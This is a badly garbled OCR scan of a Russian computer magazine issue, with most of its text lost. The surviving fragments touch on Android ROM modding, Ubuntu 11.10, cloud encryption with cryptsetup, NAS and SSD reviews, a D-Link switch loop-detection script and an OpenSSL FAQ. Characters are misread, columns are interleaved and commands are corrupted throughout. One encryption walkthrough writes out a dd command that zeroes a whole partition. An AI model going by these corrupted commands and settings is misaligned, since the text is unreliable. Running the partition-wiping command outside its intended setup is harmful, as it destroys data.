lgoo.gi/Pax1 Hl n n
layout XML l
AXML, apktool n XMLI.
n,
, , .
xda-developes, n
Andoid.
<<famewok-es
mod
_>>.

famewok-es.apk ,
unzip:
$ cd /tmp; unzip -/Nativnuxinstaller_l.l.apk
, famewok-es
diff:
n n assets/kits/mc-4.7.5.4am.ta.jet . ta. gz, n
n k-n
la , n
apk, n n n lnstalll.
n n n n
$ diff -R -/framework-res \
-/rom/system/framework/framework-res
,
famewok-es,
mc:
$ cd -/rom
$ tar -xzf /tmp/assets/kits/mc-4.7.5.4-arm.tar.jet
4PDA: goo.gl/t iH Ro.
famewok-es.apk

mc.
zi- n
aapt
apktool.
Andoid
SDK,
apktool
k-.
:
ClockwokMod Recovey. ,
$ cd -/bin; wget goo.gl/tC7k8
-/oml n uzip.
Andoid .
$ cd -/rom/system/framework
$ java -jar -/apktool.jar framework-res
n Andoid, , .
Andoid famewok/
framwork-res/dist/framework-res.apk
$ rm -rf framework-res
11
famewok-es . apk .
- .
apktool:
ng-,
cd -; wget goo.gl/hxzSl
tar -xjf apktool1 . 4.1.tar.bz2
cd -/rom/system/framework
java -jar -/apktool.jar d framework-res.apk
system/
media/bootanimation .zip. :
$ cd /tmp
$ mkdir bootanimation; cd bootanimation

famewok-es, .
- s/dw-* es/layout-*
ng-
. , dawae
land-mdpi-
l n n n
!. ,

, &
&
ANDROID
# system.prop
#
f geeric
sdk
1d.1 ibpoth; / system/ 1i/1 ibi 1switch.so

lswi tch. vendol ibp~th; / system / 1 i l ibi 1-nto-umts-1. so
lswi tch . g~nl i bp~th= /system/ l i 1ibg~n i l. so
1d. i ibogs; - d /dev/t tySB
sf. icd_dens i ty;2~B
# Default net1a10rk type.

# ~ ;} COtfl 1 EVOO.
.
te lephony. defaul t _ network=
wifi . interface
= tiwlanB
seconds. it high to minimize battery dain.

case in ~ich there mmd access points,
tl but n in ange.
wifi .supplicent_scan_interva l = 15
#
#
ime bet~.~Jeen scans in

his only affects the
# The OpenGL ES ! 1eve1 that is native1y

# his is 16.16 fixed point nut
= 131872
suppoted
this device.
.o .o pengles .vesion
build.prop Motorola Defy
FPS 241:
$ mplayer -nosound -vo png:z=9 video.avi

. xda-developes
,
n . n
.

, ,-
.
Android
system/build . pop,
n .
,
Andoid, .
.
ClockworkMod Recovery:
Android
1.
ro.HOME_APP_ADJ=l
$ unzip -/rom/system/media/bootanimation.zip

desc.txt,
n n:
n
n n
n .
FPS
n.
2.
JG-:
ro.media.enc.jpeg.quality=lee
4Se see
1 parte
partl
,
n .
480
800,
3.
IFPSI 30 / .
n
:
n n ,
t. n ! 1 n
pl. lpatll n
, n n . t
debug.sf.nobootanimation;l
4.
GPU:
, n ,
t- , n
debug.sf.hw=l
. ,
n,
0001 .png, 0002.png
. .
n ,
n .
5. !n n
n n USBI:
. n
ng- n mencode l
desc.txt
persist.adb.notify=e
> cd /rom/system/framework/
> java - jar /apktool. jar d framework-res . apk
wifi.supplicant_scan_interval=180
pm.sleep_mode=l
1 Loading resource t ,, .
1 Loaded .
1 Decoding fi le-resources ...
1 Decoding values*l* XMLs , ..
1 Done .
1 Copying assets and libs ...
> 1s fra111ework-res
Andro idMan i fest. xml apktoo 1 . yml assets
> ls framework-res/res /
values-es
anim
va 1ues-es-rES
color
values-fa
drawae
drawae-en-ldpi
values-fa-r!R
drawae-en-mdpi
values-fi
values-fi-rFI
drawae- land-ldpi
drawae-land-mdpi
values-fr
values-fr-rBE
drawae-ldpi
va lues-fr-rCA
drawae-mdpi
drawa e-nodp i
va lues-fr-rCH
layout
values-fr-rFR
va l ues-he-r 1L
layout-land
values-hi-r i N
layout-port
values-hr
raw
ro.ril.disae.power.collapse=e
3.
res
va lues-mcc23B-ko
va lues-mcc23B-n l
va l ues-mcc23B-p l
va lues-mcc23B-pt
va lues-mcc23B-pt-rPT
va 1ues-mcc23B-ru
va lues-mcc23B-sv
va lues-mcc23B-tr
va 1ues-mcc23B-zh-rCN
va lues-mcc23B-zh-rT'"
va l ues-mcc232
va l ues-mcc232-cs
va l ues-mcc232-da
va l ues-mcc232-de
1 j1m
3 j1m
dw--
dw-- 13 j1m
> 1s -1 system
u 48
dw--
2 j1m
dw--
2 j1m
1 j1m
dw-- 13 j1m
dw--
2 j1m
dw--
2 j1m
dw--
7 j1m
dw--
3 j1m
dw--
3 j1m
dw--
7 j1m
dw--
3 j1m
dw--
2 j1m
-w-----
ro.ril.enae.dtm=l
ro.ril.hsdpa.category=10
ro.ril.enale.aS=l
ro.ril.enale.g.prefix=l
ro.ril.htcmaskwl.bitmask=4294967295
ro.ril.htcmaskwl=l4449
ro.ril.hsupa.category=S
4.
1904
-w-----
ro. ril. hsxpa=2

ro.ril.gprsclass=10
ro.ril.hep=l
net.tcp.buffersize.default=4096,87380,256960,4096,16384,256960
net.tcp.buffersize .wifi=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.umts=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.gprs=4096,87380,256960,4096,16384,256960
net.tcp.buffersize.edge=4096,87380,256960,4096,16384,256960
framework-res.apk
> 1s -1
u
G-:
uses
uses
uses
1941504
4095
4095
.
HOSi .
.
29 2008 boot, img

8 15:33 META-INF
8 15:33 system
system/
build.pop .
ll*'lk
, , -
uses
uses
uses
uses
uses
uses
uses
uses
uses
uses
uses
uses
>1
4095
4096
3598
4095
4095
4095
4095
4095
4095
4095
4095
4095
HOSi.
HOSi.
.
HOSi.
HOSi.
HOSi,
HOSi.
8
8
29
8
8
10
8
HOSi.
HOSI.
8
8
8
8
HOSi.
HOSi.
HOSi .
15:33
15:33
2008
15 :33
15:33
17:15
15:33
15:33
15 :33
15:33
15:33
15 :33
bin
bui1d.pop
etc
fonts
famewok
1ib
media
tts
us
vendo
xbin
testsign .
zip:
$ cd -/rom; zip -r my-rom.zip
, Recovey
:
$ wget goo.gl/OyBBk
$ java -classpath testsign.jar testsign \
my-rom.zip my-rom-signed.zip
m y -om-siged.zip
.
6.
R e covey,
!.
ro.lge.proximity.delay=25
mot.proximity.delay=25
data / facto y e se t>>,
Wipe
l Reco v ey <Ente>J,
7.
<< Choose zip

ro.mot.buttonlight.timeout=0
,
Yes
<Ente> .
<< lnstall zip
fom sdcad ,
fom sdcad , my-om-sign.zip 50-
Yes.
system now .
<<Reboot
l:l!:lel!tj
Adoid- ,
1.
debug.performance.tuning=l
video.accelerate.hw=l
windowsmgr.max_events_per_sec=150
, ,
,
2.
1/etc/init.dl,
. :::
11
Ubuntu 11.10
UBUNTU 11.10
Oneiic Ocelot [ )- 15- Linu- Canonical.

V- [
Unity.
-,
1,5 ),
[lnkscape, GIMP, Pitivi LibeOffice). 150-

CD/DVD, USB Flash.
>>.
!
>> ).
Linux kenel3.0.1;
Launche.
Unity 4.12.0 n
Compiz 0.9.6;
GNOME3.2;
no n
Mozilla Fiefox 7.0.1, Mozil la
Thudebld 7.0.1, LightDM,
Oeja Oup,
- Gwibbe;
LibeOffice
EJ
Uity
, >>
. ,
,
: ,
, ,
Ubutu Softwae Cente
5.0

, ,
Cente
OneConf,
IFile > Sync between computes ...).
n
U
<Ai t+Tab>.

-
, .
Qt Unity 20,
OpeGL. Uity
>>. ,
01/156/2012
<<
l ud -
, ,
!
Ubuntu, . .) Softwae
Banshee
Google Oocs)
Rhyth mbox
, ,
, .
Lenses,
LoCo
Ubuntu IOash Home)

Places,
Ubutu
1,;,1 lgoo . g l /cC5k, ubuntu-defaults-builde),

Lauche.
ARM.
R- .
1111
3.4.2;
Python 3.2, GCC4.6.1, Bash4.2, CUPS 1.5.0,
Pidgin 2.10.0, UOEV 173, .g 1.10.4;
Unity 30,
Qt
20
Qt Quick.
Unity 20
Canonical
n
20 13 .
Ubuntu 12.04,
2012 , LS-,

n .
117
SYN/ACK
aka 13oz
qscentr.ru -
n GSPD
n

.
,

- .
- ,
[ ),
. ,
, .
.
118
01/156/2012
rn
, - ),
. -,
[ -I . <<
9) , ,
, ,
. ,
:
NQ687
781.
1) ,
. ,
, - ,
- .
? ,
11
, ,
, ,
21
111 , ,
[ - l .
, ,
, :
<<, , >>.
( )-
, 2 [ ) , ,
,
, ,
, , , etc.
12)
[ )
31
- ,
, . ,
, . ,
<< n
(I- ,
. :1
, ,
, ,
. -
. ,

,
58 .
, - ,
etcl, ,
[ ) .
[
) .
13)
- ,
.
41 - ,
, !
- ,
, ,
. ,
, .
, .
141 - ,
, .
51
- .

l - ,
, , ,
[ )
- ,
. ?
, , ,
, - ,

- , ,
:1
, .
16) -
. ,
,
, :
. ? , .
, [ /) ,
- . ,
[ u , ,
I, ~
), -
L; , ,
[ ) .
[ / l
'> [ ).
71
151
: /
61
- .
17) -
. ,
, , l
, ,
. ~
. ,
- , ,
. .
8) - .
: ,
, , !
,
. , , ,
, ,
, .
181
- ,
.
01/156/2012
119
SYN\ACK
19) - ,
?
, ,
. .
<<. ,
, [ , ,
1- . ) - ,
. , -
.. << - ?
, , ,
. .
- : ,
- .
[ ) .
- 90 .
:1
, ,
, -
, [
ISPDN. RU -
) .
20) - ,
. ,
, , ,
. , -
- << >>.
,
,
- -.
, [
, << >>
<< >>- ,
),

. ,
. , ,
, ,- - ,
. ::

?
n :

- , <<
11 - ,
8) -
,
>>,
, ,
, ,
, . .
etc).
9)
2)
-
152-, .
3)
, -
152- << >>.
, ,
4)
152-.
10)
, ,
, ,
- )
6)
11)
5)
- :
120
- ,
[ ) .
7)
,
-
, ,
,
.
, -
, <<
. ,
. . ,
,-
,- ,
01/156/2012
181
, - ,
,
- ?
, - ,

- 2;
. ,

-1.
- ,
. ,
181
( !,
2 -
. ,
,
.
181
.
,
r.1
1.;.1
.
. ,
.
r.1
- .
1.;.1 ,
- ?
, , , ,
. .
181
181
, -
VLAN'a
01/156/2012
121
SYN/ACK
grinder lgrinderliHux.in.ual
LUKS- ~
google.com/o/
J1.\illiiJ!
vGate R2 -
securjtycode.ru/
oroducts/sn ym-
ware/ygate com
MySQL 5.6
Reference Manual
- Encryptjon and
Comoressjon- clck.
!Lfru
Windows Azure SDK
- microsoft.com/
wjndowsazure/sdk
Novell
Cloud Security Service
novell.com/
prodcts/cloud
securjty-service
FreeOTFEfreeotfe .org
<<>>

n

""Jr\1
>>

<< . ,
IPaaS)
ISaaS) ,
.
,
.
, l
). , . <<
,
, , ,
- .
, ,
, .
, ,
v - i de x .com ,
38,9 %.
,- . ,
. ,
PR,
- ,
.
,
SaaS ISoftwae as Sevice- )

PaaS IPiatfom as Sevice - ) ,
, .
: - .
,
,
SaaS.
, ,
. ,
122
Google
Amazo,
<< ,
01 /156/2012
ctt o --<08
, << >>,
V-I NDEX 03 2011
VIRUALI ZATION
PENERATION R
CONSOLIDATION
RATIO
38.9%
5:1
11!::8
IICI:I
! >> !: -
, .
HYPERVISOR
INUSE
. , Compu teWold,
, ,
, VMwae
vSphee.
SaaS
- .
, ,
""'
GARTNER OTONVIRUALIZATION INDUSTRY

0.. ..... _
............. ~ ...
--wy ---....
Cif'q)o'9!f"~fii~<PI'I'
:-...::""
.. -lllt~
.. --~--
SaaS
.
, -
. -
. ,

v-index.com, n
! ! .
,
, -
- .
- ->> ,
<<>>. ;l
, VMwae,
R2l secuitycode . u/poducts/s vmwae/vgate com l.
. ,
- .
.
!
VMI. ,
, ! AC L ! .
vGate
- ,
IABI II
VM,
la !
. ,
, ,
-.
, . ,
.
DMZ
IVPN, /etc/host.allowl.
DDS-
.
.
l gnu.og/philosophy/who-does-that-seve-eally
seve.html l << >>
, n.
SaaS
SS-
. , . ,
.
,
, .
Secu ity Cod e Tu stAccess i secuitycode.u/

poducts/tustaccess l
f\lo,a)'I(I-....Gitl"-eAI:IW-~01..__-oADCrj'!\1,
~~~~-..,_
-1)'---e,l.l.
. ?
.. ,._, atip.~a,._.
n,p.,I.JIWVIVTtwtoel1oliRe~WC~-TI C~r--, ._,.,...o;o:f1)0,1.)'1(fY,
,
.n.S-;u~JI
, , ,
SaaS , ,
,
- VMwae
vC ioud
diton.II-~II~Aor;ryN~r<~
.Crpoom.un:r-oc<,'I'JIDf~&-.......:o;riiiiQflol'*"'
0~)'1('1
Die c to .
0(< 19:2909-0).2011)
- ,
.
. ,
01 /156/2012
v&ate
1Z3
SYN\ACK
- Novell Cloud Secuity Sevice INCSS, ovell .
com/poducts/c l oud-secuity-sevice l-
,
>> .
NCSS
>>
[ A!:tive Diectoyl. ,
SaaS/PaaS/IaaS, , NCSS
, -
, .
SaaS
Amazon 21,
NQ152
, .
<< >> [ clck . u / POdc l n
. ,
<<>>
. ,
SaaS
. ,
<<>>
. ,
, ,
, . -152
, ,
, ,
, << >>.
, ,
. ,
, ,
<< >>. ,
, .
[ !,
SaaS .
HTTPS,
. , <<
, -
<<>>,
PCI [Payment
d lnfastuctuel,
, : << >> - .
, ,
DM-CRYPT
, ,
,
PCI,
dm-cypt ,

2.6+
CyptoAPI.
, ,
, - . ,
- ? ,
ht.
<<
>> .
Windows
FeeOT F E,
Windows.
$ sudo apt-get instal l cryptset up

:
$ sudo dd if;/dev/zero of ;/dev/sda5 bs;4K
LUKS [The Linux Unified Setup, code.google . com/p/cyptsetup l,

Linux dm-cypt , n
. LUKS
TKS1 [Template
Setup 11, ,
n ,
.
/dev/mappe/ :
Windows
FeeO TFE [ feeotfe.og l,

Liux icyptoloop, dm-cypt l
$ sudo cryptsetu p - l uksFormat /dev/sda5

$ sudo cryptset up lu ksOpen / dev/s da5 encdisk

- HSM [ dw Secuity Module,

n ! PKCS#11.
, n
Windows -
, .
Bitlocke [ - EFS,
$ sud o mkfs. msdos / dev/mappe r /e ncdisk

$ sudo mount -t vfat - rw /dev/ mapper/encdisk /mnt/
encdisk
. ,
Encypted File Systeml.

,
. ,
, ,
:
. - n ,

$ sudo umount / mnt/encdisk

$ .sudo cryptset up luksClose /dev/ mapper/encdisk
, . n,
MySQL
Refeence
Manual
n. 11.13
Ecyption
01/156/2012
111rmll
ySQt..
5.6
~fetnc
Mlr'll.l.al :: 11
F\.11'\Ctns
ilnd OplililtM : 11.13 encryptn iOI"\d Compron f unc: toons
RYPTSEUP ( 8)
11.14lrlfonn.1tionfui"ICttOnJ
T.J811 . 1 7 . encryprionfun~rions
SctiorrNIIvlgatlorl
(T<>ttkJ
11 FunonrandOpertors
011/YIII UIIngAI:B
11. 1 Functn.dOpllfiltOc"
1 1 2 convers10n irr e~oreJ510
o.t!YIIIIlflg
t1 .4CO<"I'OIAowfi"ICOm
EI'IUYIJ(IJiriiiQ
RIulnlrtv~Oflhl pre- ~ . \itnpltmtnU~on01Pio.S$WORO
Clkul118 1ndlltUIIIIPIIswordS.-u.g
an .-.- 2 thecbum
:i1Z.
CaltW.Ie
Un<OI\'II)IfiiiSirl/>oComprtiSt
t~anged
deviceJRllpper 11111ppings.
For ba stc
p!ngs, there 11re four operations .

CIONS
These st rings are vatid for <attion> , fo\\owed
their cac tion 11rgs> :
-~
11 7Dateilfld"mefunctJOnJ
"""''"'
11.9fuiTetS..udlfurtenons
create s
ltlOCe;Ft.nttrOnsiOnc:IO(IeriltOI"J
I! . IIXL~
$et , -- skip ,
n enci)'PtiOn i!lnCI compresston tunctlons return stmg:s tor\lif\\cnthe resun mtgf\1: coota'I ~ IJy1eV31Ues
rr you want to store tnese re~. use coturnn Wlth Y!J!I.1A&X or 1! blny $111nQ data rype Thr, ll(dlvold
potential problems -.wn tralllng space removal or th.ractr set CD!"!,-,IOn th31 WOVId tharoge data vatues.
~n
as
11 . 13EI"IO'VI)t.IOnilndComores510
removes 11n existing

llA1
backed
device <device> .
pping
< n>.
<nome>
reports the st11tus for the
11 . 16Ft.lndJO/\'Jiidodd"rersfor
Use
118PP1IOJ <n>
wrth GROUP CliiUSes
< IIIIII! >
1-- hash , Cipher, -- ver1ty -p11ssphr11 se , -- key - flle, -- key -size, -- of
11 . 17SI).IA!Extensrons
11 18 Preosn Math
Functions,
ll.t5ielilf\o80USF~
d.ata type {gas, D.IW:I6 . .:;)
MySQL n 15
upping wi th
only l
'""""""
<options:.o can
-- relld -
!JtiiW!.I. <nllme>
11-14111fOtm.atnfunctJOnS
Compession
(inc\uding LUKS extension)
ESCRIPION
o l l J2kfurw:ti'OnJ
and
dii Cypt
cryptsetup 1s used to convenientty setup d11 -crypt

(ptain} da crypt IIIIP
11.8WhiltC.alendilrlsUsed8y
Clll.utalllll05tn.o:um
no~ "
cryptsetup setup c ryptographic volu111es for
11.61-Unent f~ill\d
Enltlirla
you use
Co~~r~ands
YNOPSIS
cryptsetup <options:o- <action:> <actio n illrgs:-
IJ .OI)er<rS
115StmQFt.c\ctJor\s
EI!CJVI)III~
m~ occtJ 11'
1'1111ntenance
CRYPTSETUP(8)
11 .13. Encryption and Compression Functions
15 .
f:'l
8 "n!rmlnal
Linux
dm-crypt
SQL- n
n,
, n .
, n ,
n .
> CREATE TABLE mdS_t (mdS_val CHAR(32), ... );

> INSERT INTO mdS_t (mdS_val, ... ) VALUES(MDS ('a bcdef'),
... );
n . n ,
,
Tend i SecueCioud, n
F eeOT FE .
<<

API
n .
Windows Azue SDK
n ,
, , n
l micosoft . com/windowsazue/sdk ), n
Windows Azue,
, n n CSP ICyptogaphic Sevice P ovide,
. n
n n ).
vCioud.
n,
, n
n
XSS
SQL injec tion
n . n
Amazon
2,
Eu calyptus
Secu eCioud << >>,
. ,
/ .
, n, n n -
, n
<<>>- , , .
n , n
, n n
, . n
, ,
n , ,
. , . - ! n
n ! , )
. ::::
Pli!aseenwlh!rurD!rofPIIICDF21:tylte"llcf&to~arriedaulcrr>yoru
~dtogenertea'ltnei1'PfDI
hene-lhei"'U'I'Oc!r,lhegr18"1heSLntyoffi!redu!lheslowa
_,~ng
c{~if,_.,tn;rlhe...._on.POA)
..
olle:JfisvQII~Ifflfl'litldeflolt,youwie~toen!l!rLI
v"-'e~tmeyoui!IOI.nt'fO-'~forthis/"USIOI"IitiSr~INt
-UierlluV'I!itltlt.dtflth~ ..ne:s~irii!*o.Jirnted\l:ldo
~.
Tend
FreeOTFE Linux
01/156/2012
Micro SecureCioud n n
< ))
125
FERRUM
.,
As
5- 6-
NAS-CEPBEPOB
NAS]
\7
.
.
,
, . , >>

. -
RAID.
RAID.

n , n n .
, n
? - n
100
NAS.
n ,
n .
NAS
, .

n n n .

lntel NAS fm Toolkit- n

NAS
. n
, n n n
n . n n
RAIDO.
RAID5
n .
n , n .
, - n
NAS.
n .
/J
126
01/156/2012
NAS
D-LINK SHARECENTER
PR01200

0-Link
~-t , n Ethenet
USB.
n
L-n . ,
n ,
n .
, ,
. ,
, ,
-n
.
0-Link
ShaeCente
1200
. n ,
n .
-
0-Link
. ,
n
iSCSI.
- .
NETGEAR READYNAS
6ULTRA
n
NETGEAR
.
n .
NETGEAR ReadyNAS
6 Ulta
2 . , n

12 ,
. n

RAI05.
>> Fon tView. ,

n .
n n
.
n , n
n .
NETGEAR ReadyNAS 6 Ulta,
, .
01 / 156/2012
127
FERRUM
NETGEAR READYNAS 6 ULTRA

ETGE AR Ready NAS 6 Ulta Plus
NETGEAR Rea dyNAS 6 U lt a.
.
- lt el

1,8
Atom,
lntel Pentium
2160,
. ,
n . ,
.
. n
F ontView
4.2.16
-,
RAID5
Boot Menu.
-,
. ,
NETGE AR ReadyNAS 6 Ult a .
,
<<>>. ,
,
.
QNAP TS-559 PRO+
QNAP TS-559
+,
QNAP
QNA P
, <<
.
QNAP TS-559
,
, .
VG- . ? ,
,
.
TS-559
VGA
QNAP
+ .
,
.
RAID5
<<
,
n .
D-Lik S h areCe
ter Pro 1200
128
2 Ethernet 110/100/1000 /l, 2

USB 2.0
JBOD, RAID , RAID 1, RAID 5, RAID 6,
RAID 10
CIFS/SMB, FTP, UPnP, , NFS, !SCSI
NETGEAR ReadyN AS
6 Ultra
NETGEAR
ReadyNAS6
Ultra Plus
lntel Atom Dual , 1,66

DDR2 DIMM 1 1
2 Ethernet 110/100/1000 / l , USB 2.0
lntel Pentium 2160 , 1,8

DDR2 DIMM 1 1
2 Ethernet 110/100/1000 /l, USB 2.0
X- RAID2, RAID , RAID 1, RAID 5, RAID 6
X-RAID2, RAID , RAID 1, RAID 5, RAID 6
CIFS/SMB, F, UPnP, , AFP, NFS, DLNA,

Bonjour
CIFS/SMB, F, UPnP, , AFP, NFS, DLNA,

Bonjour
01 /156/2012
NAS
SYNOLOGY DISKSTATION 051511+

ynology Oisk5tation 051511+ n
QNAP 5-559 +. n
5ynology n ,
. -,
. ,
. - ,
,
,
, .
. ,
y QNAP
5-559 +,
5ynology
Ois k5tatio
0515 11+
jl!-
, ,
, . ,
.
, -
. -
45
THECUS N5200XXX:

The cus N5200XXX.

.
,
NETGEAR:
, , , .
>> : l tel

Atom 0525
. ,
.
.
, .
L-, /

LAN- U5-.
Thecus N5200XXX
, .
, << ,
>>, , ,
.
Synology DiskStation DS1511+
THECUS
N5200XXX
, ,-
.
,
lntel Atom 0525, 1,8

OOR2 1 1
2 Ethernet 110/100/1000 /l, 5
USB 2.0, 2 eSATA, VGA
JBOO, RAID , RAID 1, RAIO 5, RAID 5+,
RAID 6, RAID 6+, RAIO 10, RAIO 10+
CIFS/SMB, F, F, UPnP, ,
S, AFP, NFS, OLNA, Bonjou,
iSCSI, telnet, SSH, SNMP
Oual , 1,8
OOR2, 1 1
2 Ethernet 110/100/1000 /l, 4
USB 2.0, 2 eSATA
JBOO, RAIO , RAIO 1, RAIO 5, RAIO 6,
RAID 10
CIFS/SMB, F, TFPT, UPnP, OLNA.
, AFP, NFS, Bonjour, ISCSI
lntel Atom 0525, 1,8

R SOOIMM 1 1
2 Ethernet 110/100/1000
/l, 5 USB 2.0, eSATA
JBOO, RAIO , RAIO 1, RAIO 5,
RAIO 6, RAIO 10
CIFS/SMB, F, TFPT, UPnP,
, AFP, NFS, Bonjour, ISCSI
NA5,
5-
6-. , ,

5ynology
Thecus.
QNAP,
<< .
<<
NETGEAR.
NA5
[ !,
. ::
01/156/2012
129
FERRUM
SP060GBSSDVOS25
SILICON POWER
: 550, 2, 5
: 5 3.0
: MLC
.
I Ome t e,
. : 550 /
. : 500 /
SSD /
: 60
n TRIM :
, .
IO mete'a,

,
:
. . k

HDD,
Vantag e,
. ,
Disk
B enchma k
550, ,
,

0,5 8192
n.

- 550

.
Si1icon Power
5P060GB55DV30525. -
60 , Windows 7
n
, San dF oce

SF-20 00
MLC .
3-5 ,
.
Silico w
SP0 60 GB SSDV3 0525 ,
SATA 3.0,
IOmeter:
Radom read 4 : 21,44 /
Radom write 4 : 19,77 /
Seq. read 128 : 313,41 /
Seq. write 128 : 332 /
IOmeter patterns:
Database: 36,43 /
Fileserver: 41,08 /
Workstation: 34,50 /
Webserver: 51 ,35 /
PCMark Vatage:
Test Suite: 26076
Windows Defeder : 42,95 /
Gamig: 176.73 /
lmporting pictures to Windows
Photo Gallery: 271,45 /
Windows Vista startup: 30, 18 /
Video editig using Windows Movie
Maker: 88,42 /
Windows Media Ceter:
340.73 /
Add i g music to Windows Media
Player: 151,54 /
Application loading : 167,14 /
130
. ,

est Results
0.5
1.0
2.0
4.0
8.0
16.0
32.0
64.0
128.0
256.0
512.0
1024.0
2048.0
4096.0
8192.0
-..
Write -
Read -
100 200
Write
Read
1961 3
35239
50435
16411 7
237596
316007
446227
463553
486711
488856
493674
492542
493674
489176
493674
17280
32256
54001
128548
179971
347832
396128
426883
464703
529998
546588
554109
559240
559240
556663
700 800 900 1000
300 400 500 600

Transler Rate 1 Sec
, ,
IOmete,
.
Sili co w
SP06 0GBSS DV30525
:
3 , 5 -
SSD,
480
,
,
.
w
SP060GBSSDV30525,
Si licon
. :::::
01 / 156/ 2012
3 000
000 *
MAN TV
PHREAKING
aka Lundes lsergey.lunderagmail.coml
Rx
Receive
Transmit

(n n! .
Loop-arn. ,
, ,
, .
, . ,
, .
- : ! :

- . ,

,
: l"- : << l>> .

<< ! ! - << ? - << !- <<
l ? - <<, !

- .
,
,
. -
,
. ,
, .
[boadcast stoml.
, ,
. , ,
- [. 11. <<-
... - .
loop_detection,
[! .
, - .
,
132

,
.
01 /156/2012
Loop
1. RJ45
: [
[ Ethenet [
Telnet
w-l.

.
Ethenet, I-.
1.
W-

, , . . , w

80
- I-.
DLINK DES-3200
-,

.
1.
I-
:
DES-2ee# cofig
ipaddress
ipif System \
.../....
. . . -I-, ....- .
2.
, I- ,
:
DES-32ee# show ipif

3.
w-

IP-
D-Link
RS-232,
,
,
Out-of-Band.
,
.
[, mil
Windows[. :
Baud rate: 9,
Data width: 8 bits
Parity:
Stop bits: 1
Flow Cotrol:
Lk-
t .
,
DES-3200#.
, ,

, , .
. , tl+,
<<? ,
.
,
01/1 56/ 2012
config,
133
PHREAKING
~
1... 8
----<
-----<0
RJ-45
DES-3288#config +
delete account
<usename>.
,,?" t.
w- Telnet,
I- ,
. I-

CLI:

.
-
.
DES-3288# config ipif System dhcp,

DES-3288# config ipif System ipaddress \
.../....
: Admin Use.
Admi .
... -I-, .... - ,
System- .
.
CLI:
. 0-Link
DES-3288# create accou nt admi n/user <username >
(!. n
n)
,

: << t case-sesitive w passwod>>.
0-Link
15
cofig pots. ,
, 10 /,
Success.
1-3
Admin :
Username "dlink":
DES-3288#create account admin dlink
Command: create account admin dlink
Enter case-sensitive new password: ****
Enter the new password again for confirmation:****
Success.
DES-3288#
DES-3288#config ports 1-3 speed 18_full learning

enale state enale
Command: config ports 1-3 speed 18_full learning
enale state enale
Success
show pots < n>
.
: OES-3200# config
account
NVRAM.

save:
<usename>
DES-3288#save
dlik:
DES-3288#config account dlink

Command : config accoun t dlink
Enter old password:** **
Enter case-sensitive new password: ****
Enter the new password again for confirmation:****
Success.

: OES-3200# show account.
134
,

,
01 / 156/2 012
Loop
Command: save
Saving all settings to NV-RAMoo
doneo
DES-32ee#
1%
LOOPBACK
r .
t:
IJ
- n n ,
n n
n. ,
lk-.
DES-32ee#reboot
Command: reboot
. <<lk->>.
, , ,
, n .
eset.
DES-3200#eset config
-, n
eset, .
Cshell,
Hello word
# !/in/csh
loop_detection Alcatel
interface range ethernet (1-24)
loopback-detection enale
exit
loopback-detection enale
loop_detection Dlink
loopdetect
config loopdetect recover_timer 1
config loopdetect interval 1
config loopdetect mode port-based
config loopdetect trap n
config loopdetect ports 1-24 state enaed
config loopdetect ports 25-26 state disaed
loopback .
.
, , -
, U-, , ,
# vero 1
# , ~ n
i f ( ' ps 1 grep ' redbut' 1 grep -v 'grep' 1 wc -1' <= 1 )
then
# , snmp
set snmpdir = " / usr/ local / bin / "
set community = "puic "
# snmp
set snmpcmd = "-t1 -r1 -Oqv - $community -v1 -Cf
set mib_stat = "IF-MIB: :ifOper Statuso$2"
set uid = "$1"
set fl = ' '
#
while ( "Sfl" == )
set nowstatus = ' $snmpdir/ snmpget $snmpcmd $uid
$mib_stat 1 sed 's / up/ 1/ ;s / down} e/ ;/Wrong/d ' '
i f ( " $nowstatus " == 1 ) then
echo 'Hello Wo r ld'
# e-mai l
echo " ! Hello World!" 1
sendmail -f[__] [_]
<< n . - .
[Rx Txl .
endif
sleep
end
endif
exit
2 6, 1 3.
, , -
-. .
n n n :
3.
, << >>
o/scriptocsh
I_
link . Ypal
,
n << !
. , , ,
,J HELLO WORLD
Hello wold?
! n
n , n
- !
~ v.. n
n n ,
n , ,
: ?
n [ .
41.
n :
? ,
,
. << >>,
.
- -. n
n , >>,
, - .
, n . n
. ?
. . ? !
n
01/156/2012
Hello Wold Cshell:
loop_detection , <<>>.
, n .
! :::
135
UNITS/FAQ UNITED
[lwliller.com/slepahl
FAQ United
r.t
FAQriREAL.XAKEP.RU
OpenSSL
$ echo 'GET /1.0' 1 openssl s_client

-connect example.com:443
[ ... ]
New, TLSvl/SSLv, Cipher is
n .
....
LINUXCEPBEPE?
lr,8
$ openssl aes-256-cbc -d -in \

file-test .aes -out file-test-dec
Server
SSLv.
SSL- . n
DHE-RSA-AES256-SA
OpenSSLI -,
n
puic
key is 2048
bit
Linux-ccee,
OpeenSSL
TLSv1/
. ,
OpenSSL
speed test,
OpenSSL
4.
n n sh-. ,
, ,
n:
, ,
$ for f in * ; do [ -f $f ] && openssl

aes-256-cbc -salt -in $f -out $f.enc
-pass file:password.txt ; done
,
.
1.
GnuPG [www.
gnupg.org l, n
OpenSSL:
2.
$ openssl aes-256-cbc -salt -in

file-test -out file-test.aes
enter aes-256-cbc encryption password:
Verifying - enter aes-256-cbc
encryption password:
5- .
[F., . . l
OpenSSL n
SHA 1-1 SHA1
$ openssl shal file-test-64

SHAl(eapol-64)= afc594f26ca08780737
69d24f8c04fe35f2bf8b3
filetest AES-256 [ CBCI

file-test.aes.
, SSL!TLS
n
nn NS- ,
I-
OpenSSL.
DNS-OTBETOB
&-.
3.
file-test -64:
r.t
....
5 :
$ openssl s_time -connect \

webserver.com:443
debug.exe.
64
. , debug .exe
Microsoft .
, Windows 7 Server 2008
PowerShell,
BIND [www.isc.org l.
NS-

DNS-c epep,
BIND,
ApateDNS [ it . ly/sZQiK1 1.

suit-n
Mandiant.
n NS - n
, .
I-, .
, ,
, ,
, n
ApateDNS [ n i,
NS-.
hosts?
136
DNS .
01 /156/ 2012
FAQ UNITED

. ?
.
<<
>>
PoweShell:
PS > [byte[]] $hex = get-content

-encoding byte -path
C:\temp\evil_payload.exe
PS > [System.IO.File]: :WriteAllLines( "C:\
temp \hexdump.txt" , ([string]$hex))
did
NDRID-,
. ,
ANDROID?
GOOGLE,
!
,
,
Andoid'a,
Andoid ~DK,
. ,
86. -
hexdump.txt -
. ,
Andoid -
x86l www . andoid-x86 . og l,
77 9 144
184
64
255 255
232
ARM
Bluestacks
Bluestacks
I uestacks.com l. ,
l http:Uit.ly/Ys901 l,
did-,
14 31 ....
ach tne
Qevtces !felp
~ _J
. !
,
~~
!,
!
